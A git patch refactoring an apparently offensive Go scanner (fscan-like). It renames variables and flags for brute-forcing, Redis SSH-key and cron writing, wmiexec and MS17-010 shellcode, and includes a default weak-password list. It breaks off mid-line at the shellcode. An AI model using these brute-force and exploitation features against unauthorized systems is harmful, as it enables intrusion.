From bdeabec67ee595bd08c17f18ea2013f369ddfcdf Mon Sep 17 00:00:00 2001 From: ZacharyZcR <2903735704@qq.com> Date: Fri, 20 Dec 2024 03:46:09 +0800 Subject: [PATCH] =?UTF-8?q?refactor:=20=E5=A4=A7=E5=9E=8B=E9=87=8D?= =?UTF-8?q?=E6=9E=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Common/Config.go | 128 +++++++++++++++++++--------------------- Common/Flag.go | 56 +++++++++--------- Common/Parse.go | 130 +++++++++++++++++++++-------------------- Common/ParsePort.go | 12 +--- Common/Ports.go | 7 +++ Core/PortScan.go | 4 +- Core/Scanner.go | 22 +++---- Plugins/FTP.go | 2 +- Plugins/FcgiScan.go | 6 +- Plugins/MS17010-Exp.go | 10 ++-- Plugins/MS17010.go | 4 +- Plugins/MSSQL.go | 2 +- Plugins/Mongodb.go | 2 +- Plugins/MySQL.go | 2 +- Plugins/Oracle.go | 2 +- Plugins/Postgres.go | 2 +- Plugins/RDP.go | 4 +- Plugins/Redis.go | 4 +- Plugins/SMB.go | 2 +- Plugins/SMB2.go | 14 ++--- Plugins/SSH.go | 12 ++-- Plugins/SmbGhost.go | 2 +- Plugins/VNC.go | 2 +- Plugins/WMIExec.go | 12 ++-- Plugins/WebTitle.go | 4 +- WebScan/lib/Client.go | 2 +- WebScan/lib/Eval.go | 10 ++-- 27 files changed, 227 insertions(+), 232 deletions(-) create mode 100644 Common/Ports.go diff --git a/Common/Config.go b/Common/Config.go index 580d1a2..68b93c7 100644 --- a/Common/Config.go +++ b/Common/Config.go @@ -15,33 +15,8 @@ var Userdict = map[string][]string{ var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX", "qwe123!@#", "Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789"} -var PortGroup = map[string]string{ - "ftp": "21", - "ssh": "22", - "findnet": "135", - "netbios": "139", - "smb": "445", - "mssql": "1433", - "oracle": "1521", - "mysql": "3306", - "rdp": "3389", - "psql": "5432", - "redis": "6379", - "fcgi": "9000", - "mem": "11211", - "mgo": "27017", - "ms17010": "445", - "cve20200796": "445", - "service": "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017", - "db": "1433,1521,3306,5432,6379,11211,27017", - "web": "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880", - "all": "1-65535", - "main": "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017", -} var Outputfile = "result.txt" var IsSave = true -var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880" -var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017" type PocInfo struct { Target string @@ -49,50 +24,69 @@ type PocInfo struct { } var ( - Ports string - Path string - Scantype string - Command string - SshKey string - Domain string - Username string - Password string - Proxy string - Timeout int64 = 3 - WebTimeout int64 = 5 - TmpSave bool - NoPing bool - Ping bool - Pocinfo PocInfo - NoPoc bool - IsBrute bool - RedisFile string - RedisShell string - Userfile string - Passfile string - Hashfile string - HostFile string - PortFile string - PocPath string - Threads int - URL string - UrlFile string - Urls []string - NoPorts string - NoHosts string - SC string - PortAdd string - UserAdd string - PassAdd string - BruteThread int + // 目标配置 + Ports string + ExcludePorts string // 原NoPorts + ExcludeHosts string + AddPorts string // 原PortAdd + + // 认证配置 + Username string + Password string + Domain string + SshKeyPath string // 原SshKey + AddUsers string // 原UserAdd + AddPasswords string // 原PassAdd + + // 扫描配置 + ScanMode string // 原Scantype + ThreadNum int // 原Threads + Timeout int64 = 3 LiveTop int + DisablePing bool // 原NoPing + UsePing bool // 原Ping + Command string + + // 文件配置 + HostsFile string // 原HostFile + UsersFile string // 原Userfile + PasswordsFile string // 原Passfile + HashFile string // 原Hashfile + PortsFile string // 原PortFile + + // Web配置 + TargetURL string // 原URL + URLsFile string // 原UrlFile + URLs []string // 原Urls + WebTimeout int64 = 5 + HttpProxy string // 原Proxy Socks5Proxy string - Hash string - Hashs []string - HashBytes [][]byte - HostPort []string - IsWmi bool - Noredistest bool + + // POC配置 + PocPath string + Pocinfo PocInfo + DisablePoc bool // 原NoPoc + + // Redis配置 + RedisFile string + RedisShell string + DisableRedis bool // 原Noredistest + + // 爆破配置 + DisableBrute bool // 原IsBrute + BruteThreads int // 原BruteThread + + // 其他配置 + RemotePath string // 原Path + HashValue string // 原Hash + HashValues []string // 原Hashs + HashBytes [][]byte + HostPort []string + Shellcode string // 原SC + EnableWmi bool // 原IsWmi + + // 输出配置 + DisableSave bool // 原TmpSave ) var ( diff --git a/Common/Flag.go b/Common/Flag.go index 505dd79..5b5b417 100644 --- a/Common/Flag.go +++ b/Common/Flag.go @@ -21,47 +21,47 @@ func Flag(Info *HostInfo) { // 目标配置 flag.StringVar(&Info.Host, "h", "", "目标主机IP,例如: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12") - flag.StringVar(&NoHosts, "hn", "", "排除的主机范围,例如: -hn 192.168.1.1/24") - flag.StringVar(&Ports, "p", DefaultPorts, "端口配置,例如: 22 | 1-65535 | 22,80,3306") - flag.StringVar(&PortAdd, "pa", "", "在默认端口基础上添加端口,-pa 3389") - flag.StringVar(&NoPorts, "pn", "", "排除的端口,例如: -pn 445") + flag.StringVar(&ExcludeHosts, "eh", "", "排除的主机范围,例如: -eh 192.168.1.1/24") + flag.StringVar(&Ports, "p", MainPorts, "端口配置,例如: 22 | 1-65535 | 22,80,3306") + flag.StringVar(&AddPorts, "pa", "", "在默认端口基础上添加端口,-pa 3389") + flag.StringVar(&ExcludePorts, "pn", "", "排除的端口,例如: -pn 445") // 认证配置 - flag.StringVar(&UserAdd, "usera", "", "在默认用户列表基础上添加用户,-usera user") - flag.StringVar(&PassAdd, "pwda", "", "在默认密码列表基础上添加密码,-pwda password") + flag.StringVar(&AddUsers, "usera", "", "在默认用户列表基础上添加用户,-usera user") + flag.StringVar(&AddPasswords, "pwda", "", "在默认密码列表基础上添加密码,-pwda password") flag.StringVar(&Username, "user", "", "用户名") flag.StringVar(&Password, "pwd", "", "密码") flag.StringVar(&Domain, "domain", "", "域名(用于SMB)") - flag.StringVar(&SshKey, "sshkey", "", "SSH密钥文件(id_rsa)") + flag.StringVar(&SshKeyPath, "sshkey", "", "SSH密钥文件(id_rsa)") // 扫描配置 - flag.StringVar(&Scantype, "m", "all", "扫描类型,例如: -m ssh") - flag.IntVar(&Threads, "t", 600, "线程数量") + flag.StringVar(&ScanMode, "m", "all", "扫描类型,例如: -m ssh") + flag.IntVar(&ThreadNum, "t", 600, "线程数量") flag.Int64Var(&Timeout, "time", 3, "超时时间(秒)") flag.IntVar(&LiveTop, "top", 10, "显示存活主机数量") - flag.BoolVar(&NoPing, "np", false, "禁用存活探测") - flag.BoolVar(&Ping, "ping", false, "使用ping替代ICMP") + flag.BoolVar(&DisablePing, "np", false, "禁用存活探测") + flag.BoolVar(&UsePing, "ping", false, "使用ping替代ICMP") flag.StringVar(&Command, "c", "", "执行命令(支持ssh|wmiexec)") // 文件配置 - flag.StringVar(&HostFile, "hf", "", "主机列表文件") - flag.StringVar(&Userfile, "userf", "", "用户名字典") - flag.StringVar(&Passfile, "pwdf", "", "密码字典") - flag.StringVar(&Hashfile, "hashf", "", "Hash字典") - flag.StringVar(&PortFile, "portf", "", "端口列表文件") + flag.StringVar(&HostsFile, "hf", "", "主机列表文件") + flag.StringVar(&UsersFile, "userf", "", "用户名字典") + flag.StringVar(&PasswordsFile, "pwdf", "", "密码字典") + flag.StringVar(&HashFile, "hashf", "", "Hash字典") + flag.StringVar(&PortsFile, "portf", "", "端口列表文件") // Web配置 - flag.StringVar(&URL, "u", "", "目标URL") - flag.StringVar(&UrlFile, "uf", "", "URL列表文件") + flag.StringVar(&TargetURL, "u", "", "目标URL") + flag.StringVar(&URLsFile, "uf", "", "URL列表文件") flag.StringVar(&Cookie, "cookie", "", "设置Cookie") flag.Int64Var(&WebTimeout, "wt", 5, "Web请求超时时间") - flag.StringVar(&Proxy, "proxy", "", "设置HTTP代理") + flag.StringVar(&HttpProxy, "proxy", "", "设置HTTP代理") flag.StringVar(&Socks5Proxy, "socks5", "", "设置Socks5代理(将用于TCP连接,超时设置将失效)") // POC配置 flag.StringVar(&PocPath, "pocpath", "", "POC文件路径") flag.StringVar(&Pocinfo.PocName, "pocname", "", "使用包含指定名称的POC,例如: -pocname weblogic") - flag.BoolVar(&NoPoc, "nopoc", false, "禁用Web漏洞扫描") + flag.BoolVar(&DisablePoc, "nopoc", false, "禁用Web漏洞扫描") flag.BoolVar(&PocFull, "full", false, "完整POC扫描,如:shiro 100个key") flag.BoolVar(&DnsLog, "dns", false, "启用dnslog验证") flag.IntVar(&PocNum, "num", 20, "POC并发数") @@ -69,21 +69,21 @@ func Flag(Info *HostInfo) { // Redis利用配置 flag.StringVar(&RedisFile, "rf", "", "Redis写入SSH公钥文件") flag.StringVar(&RedisShell, "rs", "", "Redis写入计划任务") - flag.BoolVar(&Noredistest, "noredis", false, "禁用Redis安全检测") + flag.BoolVar(&DisableRedis, "noredis", false, "禁用Redis安全检测") // 暴力破解配置 - flag.BoolVar(&IsBrute, "nobr", false, "禁用密码爆破") - flag.IntVar(&BruteThread, "br", 1, "密码爆破线程数") + flag.BoolVar(&DisableBrute, "nobr", false, "禁用密码爆破") + flag.IntVar(&BruteThreads, "br", 1, "密码爆破线程数") // 其他配置 - flag.StringVar(&Path, "path", "", "FCG/SMB远程文件路径") - flag.StringVar(&Hash, "hash", "", "Hash值") - flag.StringVar(&SC, "sc", "", "MS17漏洞shellcode") - flag.BoolVar(&IsWmi, "wmi", false, "启用WMI") + flag.StringVar(&RemotePath, "path", "", "FCG/SMB远程文件路径") + flag.StringVar(&HashValue, "hash", "", "Hash值") + flag.StringVar(&Shellcode, "sc", "", "MS17漏洞shellcode") + flag.BoolVar(&EnableWmi, "wmi", false, "启用WMI") // 输出配置 flag.StringVar(&Outputfile, "o", "result.txt", "结果输出文件") - flag.BoolVar(&TmpSave, "no", false, "禁用结果保存") + flag.BoolVar(&DisableSave, "no", false, "禁用结果保存") flag.BoolVar(&Silent, "silent", false, "静默扫描模式") flag.BoolVar(&Nocolor, "nocolor", false, "禁用彩色输出") flag.BoolVar(&JsonOutput, "json", false, "JSON格式输出") diff --git a/Common/Parse.go b/Common/Parse.go index 1dab7f6..b0bfb5f 100644 --- a/Common/Parse.go +++ b/Common/Parse.go @@ -21,7 +21,7 @@ func Parse(Info *HostInfo) { // ParseUser 解析用户名配置,支持直接指定用户名列表或从文件读取 func ParseUser() error { // 如果未指定用户名和用户名文件,直接返回 - if Username == "" && Userfile == "" { + if Username == "" && UsersFile == "" { return nil } @@ -34,8 +34,8 @@ func ParseUser() error { } // 从文件加载用户名列表 - if Userfile != "" { - users, err := Readfile(Userfile) + if UsersFile != "" { + users, err := Readfile(UsersFile) if err != nil { return fmt.Errorf("读取用户名文件失败: %v", err) } @@ -77,8 +77,8 @@ func ParsePass(Info *HostInfo) error { } // 从文件加载密码列表 - if Passfile != "" { - passes, err := Readfile(Passfile) + if PasswordsFile != "" { + passes, err := Readfile(PasswordsFile) if err != nil { return fmt.Errorf("读取密码文件失败: %v", err) } @@ -92,8 +92,8 @@ func ParsePass(Info *HostInfo) error { } // 处理哈希文件 - if Hashfile != "" { - hashes, err := Readfile(Hashfile) + if HashFile != "" { + hashes, err := Readfile(HashFile) if err != nil { return fmt.Errorf("读取哈希文件失败: %v", err) } @@ -104,7 +104,7 @@ func ParsePass(Info *HostInfo) error { continue } if len(line) == 32 { - Hashs = append(Hashs, line) + HashValues = append(HashValues, line) validCount++ } else { fmt.Printf("[!] 无效的哈希值(长度!=32): %s\n", line) @@ -114,23 +114,23 @@ func ParsePass(Info *HostInfo) error { } // 处理直接指定的URL列表 - if URL != "" { - urls := strings.Split(URL, ",") + if TargetURL != "" { + urls := strings.Split(TargetURL, ",") tmpUrls := make(map[string]struct{}) for _, url := range urls { if url != "" { if _, ok := tmpUrls[url]; !ok { tmpUrls[url] = struct{}{} - Urls = append(Urls, url) + URLs = append(URLs, url) } } } - fmt.Printf("[*] 已加载直接指定的URL: %d 个\n", len(Urls)) + fmt.Printf("[*] 已加载直接指定的URL: %d 个\n", len(URLs)) } // 从文件加载URL列表 - if UrlFile != "" { - urls, err := Readfile(UrlFile) + if URLsFile != "" { + urls, err := Readfile(URLsFile) if err != nil { return fmt.Errorf("读取URL文件失败: %v", err) } @@ -140,7 +140,7 @@ func ParsePass(Info *HostInfo) error { if url != "" { if _, ok := tmpUrls[url]; !ok { tmpUrls[url] = struct{}{} - Urls = append(Urls, url) + URLs = append(URLs, url) } } } @@ -148,8 +148,8 @@ func ParsePass(Info *HostInfo) error { } // 从文件加载端口列表 - if PortFile != "" { - ports, err := Readfile(PortFile) + if PortsFile != "" { + ports, err := Readfile(PortsFile) if err != nil { return fmt.Errorf("读取端口文件失败: %v", err) } @@ -205,53 +205,53 @@ func Readfile(filename string) ([]string, error) { // ParseInput 解析和验证输入参数配置 func ParseInput(Info *HostInfo) error { // 检查必要的目标参数 - if Info.Host == "" && HostFile == "" && URL == "" && UrlFile == "" { + if Info.Host == "" && HostsFile == "" && TargetURL == "" && URLsFile == "" { fmt.Println("[!] 未指定扫描目标") flag.Usage() return fmt.Errorf("必须指定扫描目标") } // 配置基本参数 - if BruteThread <= 0 { - BruteThread = 1 - fmt.Printf("[*] 已将暴力破解线程数设置为: %d\n", BruteThread) + if BruteThreads <= 0 { + BruteThreads = 1 + fmt.Printf("[*] 已将暴力破解线程数设置为: %d\n", BruteThreads) } - if TmpSave { + if DisableSave { IsSave = false fmt.Println("[*] 已启用临时保存模式") } // 处理端口配置 - if Ports == DefaultPorts { - Ports += "," + Webport + if Ports == MainPorts { + Ports += "," + WebPorts } - if PortAdd != "" { + if AddPorts != "" { if strings.HasSuffix(Ports, ",") { - Ports += PortAdd + Ports += AddPorts } else { - Ports += "," + PortAdd + Ports += "," + AddPorts } - fmt.Printf("[*] 已添加额外端口: %s\n", PortAdd) + fmt.Printf("[*] 已添加额外端口: %s\n", AddPorts) } // 处理用户名配置 - if UserAdd != "" { - users := strings.Split(UserAdd, ",") + if AddUsers != "" { + users := strings.Split(AddUsers, ",") for dict := range Userdict { Userdict[dict] = append(Userdict[dict], users...) Userdict[dict] = RemoveDuplicate(Userdict[dict]) } - fmt.Printf("[*] 已添加额外用户名: %s\n", UserAdd) + fmt.Printf("[*] 已添加额外用户名: %s\n", AddUsers) } // 处理密码配置 - if PassAdd != "" { - passes := strings.Split(PassAdd, ",") + if AddPasswords != "" { + passes := strings.Split(AddPasswords, ",") Passwords = append(Passwords, passes...) Passwords = RemoveDuplicate(Passwords) - fmt.Printf("[*] 已添加额外密码: %s\n", PassAdd) + fmt.Printf("[*] 已添加额外密码: %s\n", AddPasswords) } // 处理Socks5代理配置 @@ -268,45 +268,45 @@ func ParseInput(Info *HostInfo) error { if err != nil { return fmt.Errorf("Socks5代理格式错误: %v", err) } - NoPing = true + DisablePing = true fmt.Printf("[*] 使用Socks5代理: %s\n", Socks5Proxy) } // 处理HTTP代理配置 - if Proxy != "" { - switch Proxy { + if HttpProxy != "" { + switch HttpProxy { case "1": - Proxy = "http://127.0.0.1:8080" + HttpProxy = "http://127.0.0.1:8080" case "2": - Proxy = "socks5://127.0.0.1:1080" + HttpProxy = "socks5://127.0.0.1:1080" default: - if !strings.Contains(Proxy, "://") { - Proxy = "http://127.0.0.1:" + Proxy + if !strings.Contains(HttpProxy, "://") { + HttpProxy = "http://127.0.0.1:" + HttpProxy } } - if !strings.HasPrefix(Proxy, "socks") && !strings.HasPrefix(Proxy, "http") { + if !strings.HasPrefix(HttpProxy, "socks") && !strings.HasPrefix(HttpProxy, "http") { return fmt.Errorf("不支持的代理类型") } - _, err := url.Parse(Proxy) + _, err := url.Parse(HttpProxy) if err != nil { return fmt.Errorf("代理格式错误: %v", err) } - fmt.Printf("[*] 使用代理: %s\n", Proxy) + fmt.Printf("[*] 使用代理: %s\n", HttpProxy) } // 处理Hash配置 - if Hash != "" { - if len(Hash) != 32 { + if HashValue != "" { + if len(HashValue) != 32 { return fmt.Errorf("Hash长度必须为32位") } - Hashs = append(Hashs, Hash) + HashValues = append(HashValues, HashValue) } // 处理Hash列表 - Hashs = RemoveDuplicate(Hashs) - for _, hash := range Hashs { + HashValues = RemoveDuplicate(HashValues) + for _, hash := range HashValues { hashByte, err := hex.DecodeString(hash) if err != nil { fmt.Printf("[!] Hash解码失败: %s\n", hash) @@ -314,7 +314,7 @@ func ParseInput(Info *HostInfo) error { } HashBytes = append(HashBytes, hashByte) } - Hashs = []string{} + HashValues = []string{} return nil } @@ -323,34 +323,36 @@ func ParseInput(Info *HostInfo) error { func ParseScantype(Info *HostInfo) error { // 先处理特殊扫描类型 specialTypes := map[string]string{ - "hostname": "135,137,139,445", - "webonly": Webport, - "webpoc": Webport, - "web": Webport, - "portscan": DefaultPorts + "," + Webport, - "main": DefaultPorts, - "all": DefaultPorts + "," + Webport, - "icmp": "", // ICMP不需要端口 + "service": ServicePorts, + "db": DbPorts, + "web": WebPorts, + "all": AllPorts, + "main": MainPorts, + "port": MainPorts + "," + WebPorts, + "icmp": "", // ICMP不需要端口 } // 如果是特殊扫描类型 - if customPorts, isSpecial := specialTypes[Scantype]; isSpecial { - if Scantype != "all" && Ports == DefaultPorts+","+Webport { + if customPorts, isSpecial := specialTypes[ScanMode]; isSpecial { + // 专门处理 all 类型 + if ScanMode == "all" { + Ports = AllPorts // 直接设置为 1-65535 + } else if Ports == MainPorts+","+WebPorts { Ports = customPorts } - fmt.Printf("[*] 扫描类型: %s, 目标端口: %s\n", Scantype, Ports) + fmt.Printf("[*] 扫描类型: %s, 目标端口: %s\n", ScanMode, Ports) return nil } // 检查是否是注册的插件类型 - plugin, validType := PluginManager[Scantype] + plugin, validType := PluginManager[ScanMode] if !validType { showmode() - return fmt.Errorf("无效的扫描类型: %s", Scantype) + return fmt.Errorf("无效的扫描类型: %s", ScanMode) } // 如果是插件扫描且使用默认端口配置 - if Ports == DefaultPorts+","+Webport { + if Ports == MainPorts+","+WebPorts { if plugin.Port > 0 { Ports = strconv.Itoa(plugin.Port) } diff --git a/Common/ParsePort.go b/Common/ParsePort.go index 9363913..e1485dc 100644 --- a/Common/ParsePort.go +++ b/Common/ParsePort.go @@ -23,20 +23,12 @@ func ParsePort(ports string) []int { continue } - // 处理预定义端口组 - if PortGroup[port] != "" { - groupPorts := ParsePort(PortGroup[port]) - scanPorts = append(scanPorts, groupPorts...) - fmt.Printf("[*] 解析端口组 %s -> %v\n", port, groupPorts) - continue - } - // 处理端口范围 upper := port if strings.Contains(port, "-") { ranges := strings.Split(port, "-") if len(ranges) < 2 { - fmt.Printf("[!] 无效的端口范围格式: %s\n", port) + fmt.Printf("[-] 无效的端口范围格式: %s\n", port) continue } @@ -57,7 +49,7 @@ func ParsePort(ports string) []int { end, _ := strconv.Atoi(upper) for i := start; i <= end; i++ { if i > 65535 || i < 1 { - fmt.Printf("[!] 忽略无效端口: %d\n", i) + fmt.Printf("[-] 忽略无效端口: %d\n", i) continue } scanPorts = append(scanPorts, i) diff --git a/Common/Ports.go b/Common/Ports.go new file mode 100644 index 0000000..b10c3f9 --- /dev/null +++ b/Common/Ports.go @@ -0,0 +1,7 @@ +package Common + +var ServicePorts = "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017" +var DbPorts = "1433,1521,3306,5432,6379,11211,27017" +var WebPorts = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880" +var AllPorts = "1-65535" +var MainPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017" diff --git a/Core/PortScan.go b/Core/PortScan.go index 47cb659..5e3c06e 100644 --- a/Core/PortScan.go +++ b/Core/PortScan.go @@ -29,7 +29,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { probePorts = excludeNoPorts(probePorts) // 创建通道 - workers := Common.Threads + workers := Common.ThreadNum addrs := make(chan Addr, 100) results := make(chan string, 100) var wg sync.WaitGroup @@ -110,7 +110,7 @@ func NoPortScan(hostslist []string, ports string) []string { // excludeNoPorts 排除指定的端口 func excludeNoPorts(ports []int) []int { - noPorts := Common.ParsePort(Common.NoPorts) + noPorts := Common.ParsePort(Common.ExcludePorts) if len(noPorts) == 0 { return ports } diff --git a/Core/Scanner.go b/Core/Scanner.go index 802291b..8e79ef2 100644 --- a/Core/Scanner.go +++ b/Core/Scanner.go @@ -13,8 +13,8 @@ func Scan(info Common.HostInfo) { fmt.Println("[*] 开始信息扫描...") // 本地信息收集模块 - if Common.Scantype == "localinfo" { - ch := make(chan struct{}, Common.Threads) + if Common.ScanMode == "localinfo" { + ch := make(chan struct{}, Common.ThreadNum) wg := sync.WaitGroup{} AddScan("localinfo", info, &ch, &wg) wg.Wait() @@ -25,7 +25,7 @@ func Scan(info Common.HostInfo) { } // 解析目标主机IP - Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts) + Hosts, err := Common.ParseIP(info.Host, Common.HostsFile, Common.ExcludeHosts) if err != nil { fmt.Printf("[!] 解析主机错误: %v\n", err) return @@ -33,23 +33,23 @@ func Scan(info Common.HostInfo) { // 初始化配置 lib.Inithttp() - ch := make(chan struct{}, Common.Threads) + ch := make(chan struct{}, Common.ThreadNum) wg := sync.WaitGroup{} var AlivePorts []string if len(Hosts) > 0 || len(Common.HostPort) > 0 { // ICMP存活性检测 - if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" { - Hosts = CheckLive(Hosts, Common.Ping) + if (Common.DisablePing == false && len(Hosts) > 1) || Common.ScanMode == "icmp" { + Hosts = CheckLive(Hosts, Common.UsePing) fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts)) - if Common.Scantype == "icmp" { + if Common.ScanMode == "icmp" { Common.LogWG.Wait() return } } // 端口扫描策略 - AlivePorts = executeScanStrategy(Hosts, Common.Scantype) + AlivePorts = executeScanStrategy(Hosts, Common.ScanMode) // 处理自定义端口 if len(Common.HostPort) > 0 { @@ -69,12 +69,12 @@ func Scan(info Common.HostInfo) { } info.Host, info.Ports = hostParts[0], hostParts[1] - executeScanTasks(info, Common.Scantype, &ch, &wg) + executeScanTasks(info, Common.ScanMode, &ch, &wg) } } // URL扫描 - for _, url := range Common.Urls { + for _, url := range Common.URLs { info.Url = url AddScan("web", info, &ch, &wg) } @@ -115,7 +115,7 @@ func executeScanTasks(info Common.HostInfo, scanType string, ch *chan struct{}, switch info.Ports { case "135": AddScan("findnet", info, ch, wg) - if Common.IsWmi { + if Common.EnableWmi { AddScan("wmiexec", info, ch, wg) } case "445": diff --git a/Plugins/FTP.go b/Plugins/FTP.go index 041999e..e7e8c28 100644 --- a/Plugins/FTP.go +++ b/Plugins/FTP.go @@ -11,7 +11,7 @@ import ( // FtpScan 执行FTP服务扫描 func FtpScan(info *Common.HostInfo) (tmperr error) { // 如果已开启暴力破解则直接返回 - if Common.IsBrute { + if Common.DisableBrute { return } diff --git a/Plugins/FcgiScan.go b/Plugins/FcgiScan.go index c01c064..3f23b9e 100644 --- a/Plugins/FcgiScan.go +++ b/Plugins/FcgiScan.go @@ -21,14 +21,14 @@ import ( // FcgiScan 执行FastCGI服务器漏洞扫描 func FcgiScan(info *Common.HostInfo) error { // 如果设置了暴力破解模式则跳过 - if Common.IsBrute { + if Common.DisableBrute { return nil } // 设置目标URL路径 url := "/etc/issue" - if Common.Path != "" { - url = Common.Path + if Common.RemotePath != "" { + url = Common.RemotePath } addr := fmt.Sprintf("%v:%v", info.Host, info.Ports) diff --git a/Plugins/MS17010-Exp.go b/Plugins/MS17010-Exp.go index c88d384..3f1d624 100644 --- a/Plugins/MS17010-Exp.go +++ b/Plugins/MS17010-Exp.go @@ -19,7 +19,7 @@ func MS17010EXP(info *Common.HostInfo) { var sc string // 根据不同类型选择shellcode - switch Common.SC { + switch Common.Shellcode { case "bind": // msfvenom生成的Bind Shell, 监听64531端口 sc_enc := 